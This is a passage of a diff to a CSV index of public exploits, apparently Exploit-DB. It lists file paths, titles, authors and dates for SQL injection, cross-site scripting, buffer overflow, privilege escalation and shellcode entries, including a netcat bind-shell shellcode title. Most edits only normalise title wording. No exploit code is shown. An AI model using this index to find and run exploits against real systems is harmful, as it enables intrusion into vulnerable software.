SQL Injection (2)",2015-04-23,"Felipe Molina",php,webapps,0 +36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue WordPress Plugin - Unauthenticated SQL Injection (1)",2015-04-23,"Felipe Molina",php,webapps,0 +36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue WordPress Plugin - Unauthenticated SQL Injection (2)",2015-04-23,"Felipe Molina",php,webapps,0 36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 '.wav' - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0 36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 '.wav' - SEH Based Buffer Overflow (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0 @@ -33240,7 +33243,7 @@ id,file,description,date,author,platform,type,port 36835,platforms/php/webapps/36835.txt,"Joomla Xcomp 'com_xcomp' Component - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution (PoC)",2015-04-27,"Jay Turla",multiple,remote,0 36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 -36844,platforms/php/webapps/36844.txt,"Wordpress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps,0 +36844,platforms/php/webapps/36844.txt,"WordPress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps,0 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0 36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,local,0 @@ -33253,11 +33256,11 @@ id,file,description,date,author,platform,type,port 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x - viewFriends.php Multiple Parameter Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0 36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x - explanation.php explain Parameter Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0 36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0 -36856,platforms/php/webapps/36856.txt,"Joomla! 'com_xvs' Component - 'controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 +36856,platforms/php/webapps/36856.txt,"Joomla! 'com_xvs' Component - 'Controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0 36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0 -36860,platforms/php/webapps/36860.txt,"Wordpress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80 +36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80 36863,platforms/php/webapps/36863.txt,"Joomla Machine Component - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0 @@ -33291,7 +33294,7 @@ id,file,description,date,author,platform,type,port 36894,platforms/php/webapps/36894.txt,"Fork CMS 3.x - backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display Cross-Site Scripting",2012-02-28,anonymous,php,webapps,0 36895,platforms/php/webapps/36895.txt,"starCMS - 'q' Parameter URI Cross-Site Scripting",2012-03-02,Am!r,php,webapps,0 36896,platforms/windows/dos/36896.pl,"Splash PRO 1.12.1 - '.avi' File Denial of Service",2012-03-03,"Senator of Pirates",windows,dos,0 -36897,platforms/php/webapps/36897.txt,"LastGuru ASP GuestBook - 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 +36897,platforms/php/webapps/36897.txt,"LastGuru ASP Guestbook - 'View.asp' SQL Injection",2012-03-04,demonalex,php,webapps,0 36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 - search.php Multiple Parameter Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps,0 36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 - photo_search.php Multiple Parameter Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps,0 36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 - photo_view.php return Parameter Cross-Site Scripting",2012-03-05,"Aung Khant",php,webapps,0 @@ -33311,11 +33314,11 @@ id,file,description,date,author,platform,type,port 36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web",2015-05-06,Vulnerability-Lab,ios,webapps,0 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)",2015-05-04,beford,linux,dos,0 -36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 Plugin - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / File Upload",2015-05-04,"Felipe Molina",php,webapps,0 +36907,platforms/php/webapps/36907.txt,"WordPress Ultimate Product Catalogue 3.1.2 Plugin - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / File Upload",2015-05-04,"Felipe Molina",php,webapps,0 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 36965,platforms/php/webapps/36965.txt,"Omnistar Live - Cross-Site Scripting / SQL Injection",2012-03-13,sonyy,php,webapps,0 36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 - Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local,0 -36967,platforms/php/webapps/36967.txt,"Max's GuestBook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Inclusion",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 - Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 @@ -33327,7 +33330,7 @@ id,file,description,date,author,platform,type,port 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 - Local Buffer Overflow",2012-03-08,"Julien Ahrens",windows,local,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 -36930,platforms/multiple/webapps/36930.txt,"Wordpress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 +36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900 36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0 @@ -33335,11 +33338,11 @@ id,file,description,date,author,platform,type,port 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0 36937,platforms/php/webapps/36937.html,"PHPMyVisites 2.4 - PHPmv2/index.php Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 -36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 +36938,platforms/php/webapps/36938.txt,"Singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 -36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal - Persistent Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 -36942,platforms/php/webapps/36942.txt,"Wordpress Freshmail Plugin 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 +36941,platforms/xml/webapps/36941.txt,"IBM Websphere Portal - Persistent Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 +36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps,0 36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 36945,platforms/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection",2012-03-12,l20ot,hardware,remote,0 @@ -33349,16 +33352,16 @@ id,file,description,date,author,platform,type,port 36949,platforms/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272 36950,platforms/php/webapps/36950.txt,"Syncrify Server 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5800 36951,platforms/php/webapps/36951.txt,"SynaMan 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 -36952,platforms/php/webapps/36952.txt,"Wordpress N-Media Website Contact Form with File Upload 1.5 Plugin - Local File Inclusion",2015-05-08,T3N38R15,php,webapps,0 +36952,platforms/php/webapps/36952.txt,"WordPress N-Media Website Contact Form with File Upload 1.5 Plugin - Local File Inclusion",2015-05-08,T3N38R15,php,webapps,0 36953,platforms/php/webapps/36953.txt,"SynTail 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 -36954,platforms/php/webapps/36954.txt,"Wordpress Yet Another Related Posts Plugin 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80 +36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80 36955,platforms/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free",2015-05-08,Metasploit,windows,remote,0 -36957,platforms/php/remote/36957.rb,"Wordpress RevSlider 3.0.95 Plugin - File Upload and Execute",2015-05-08,Metasploit,php,remote,80 -36958,platforms/php/webapps/36958.txt,"Wordpress Ultimate Profile Builder Plugin 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 -36959,platforms/php/webapps/36959.txt,"Wordpress ClickBank Ads Plugin 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - File Upload and Execute",2015-05-08,Metasploit,php,remote,80 +36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080 -36961,platforms/php/webapps/36961.txt,"Wordpress Ad Inserter Plugin 1.5.2 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36961,platforms/php/webapps/36961.txt,"WordPress Ad Inserter Plugin 1.5.2 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36962,platforms/windows/remote/36962.rb,"Adobe Flash Player - NetConnection Type Confusion",2015-05-08,Metasploit,windows,remote,0 36963,platforms/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",linux,webapps,0 36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management - Arbitrary File Upload",2015-05-08,Metasploit,java,remote,443 @@ -33367,7 +33370,7 @@ id,file,description,date,author,platform,type,port 36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Full Path Disclosure",2012-03-18,Websecurity,cgi,webapps,0 36977,platforms/php/webapps/36977.pl,"CreateVision CreateVision CMS - 'id' Parameter SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0 -36979,platforms/php/webapps/36979.sh,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 +36979,platforms/php/webapps/36979.sh,"WordPress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 @@ -33378,18 +33381,18 @@ id,file,description,date,author,platform,type,port 36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0 36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injections",2015-05-11,"Filippo Roncari",php,webapps,0 -36990,platforms/php/webapps/36990.txt,"eFront 3.6.15 - Path Traversal",2015-05-11,"Filippo Roncari",php,webapps,0 +36990,platforms/php/webapps/36990.txt,"eFront 3.6.15 - Directory Traversal",2015-05-11,"Filippo Roncari",php,webapps,0 36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection",2015-05-11,"Filippo Roncari",php,webapps,0 36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - Cross-Site Request Forgery Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0 -36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal",2015-05-11,hyp3rlinx,php,webapps,0 +36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,php,webapps,0 36996,platforms/unix/remote/36996.rb,"SixApart MovableType - Storable Perl Code Execution",2015-05-12,Metasploit,unix,remote,80 36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php' authors[][url] Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 -37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php Parameter Parametereter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 -37003,platforms/php/webapps/37003.txt,"Wordpress Booking Calendar Contact Form 1.0.2 Plugin - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 +37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 +37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 Plugin - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 - Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 @@ -33400,7 +33403,7 @@ id,file,description,date,author,platform,type,port 37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 - 'index.php' do Parameter Cross-Site Scripting",2012-03-27,waraxe,php,webapps,0 37014,platforms/windows/dos/37014.py,"iFTP 2.21 - Buffer Overflow Crash (PoC)",2015-05-14,"dogo h@ck",windows,dos,0 37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 -37016,platforms/php/webapps/37016.txt,"Wordpress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 +37016,platforms/php/webapps/37016.txt,"WordPress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Parameter Cross-Site Scripting",2012-03-28,sonyy,php,webapps,0 37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 - 'index.php' conditions[usergroup][] Parameter SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 - 'index.php' conditions[usergroup][] Parameter Cross-Site Scripting",2013-03-27,"Aditya Modha",php,webapps,0 @@ -33436,9 +33439,9 @@ id,file,description,date,author,platform,type,port 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,Wadeek,php,webapps,0 37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use-After-Free (Denial of Service)",2015-05-18,"Denis Andzakovic",linux,dos,0 -37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 +37052,platforms/windows/local/37052.c,"Microsoft Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) (PoC)",2015-05-18,"Marcus Meissner",multiple,dos,0 -37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal",2015-05-18,pandujar,php,webapps,0 +37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal",2015-05-18,pandujar,php,webapps,0 37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0 37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion",2015-05-18,Vulnerability-Lab,ios,webapps,80 @@ -33446,30 +33449,30 @@ id,file,description,date,author,platform,type,port 37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 - Cross-Site Request Forgery",2015-05-18,"Akash S. Chavan",windows,webapps,0 37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial Of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 37062,platforms/php/webapps/37062.txt,"vBulletin 4.1.10 - 'announcementid' Parameter SQL Injection",2012-04-04,Am!r,php,webapps,0 -37063,platforms/php/webapps/37063.txt,"Wordpress TagGator Plugin - 'tagid' Parameter SQL Injection",2012-04-05,Am!r,php,webapps,0 -37064,platforms/win_x86-64/local/37064.py,"Windows 8.0 < 8.1 x64 - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0 +37063,platforms/php/webapps/37063.txt,"WordPress TagGator Plugin - 'tagid' Parameter SQL Injection",2012-04-05,Am!r,php,webapps,0 +37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0 < 8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC - Remote Control Script",2015-05-20,Photubias,hardware,remote,0 -37067,platforms/php/webapps/37067.txt,"Wordpress FeedWordpress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 +37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 37068,platforms/windows/dos/37068.py,"ZOC SSH Client - Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 -37070,platforms/php/webapps/37070.txt,"Wordpress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 +37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion / SQL Injection",2012-04-09,wacky,php,webapps,0 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 - Multiple SQL Injections (2)",2012-04-10,"Chokri B.A",php,webapps,0 37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0 -37074,platforms/php/webapps/37074.txt,"Wordpress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 +37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 - Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80 -37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for Wordpress - agenda-widget-form.php title Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for Wordpress - box_publish_button.php button_value Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for Wordpress - save_successful.php msg Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for Wordpress - agenda-widget.php Multiple Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - agenda-widget-form.php title Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - box_publish_button.php button_value Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - save_successful.php msg Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - agenda-widget.php Multiple Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injections",2015-05-21,"Filippo Roncari",php,webapps,80 -37080,platforms/php/webapps/37080.txt,"Wordpress WP Symposium Plugin 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 +37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0 37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps,0 37083,platforms/php/webapps/37083.txt,"Joomla! Beatz Plugin 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0 37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 - Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps,0 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0 -37086,platforms/php/webapps/37086.txt,"Wordpress Yahoo Answer Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 +37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition 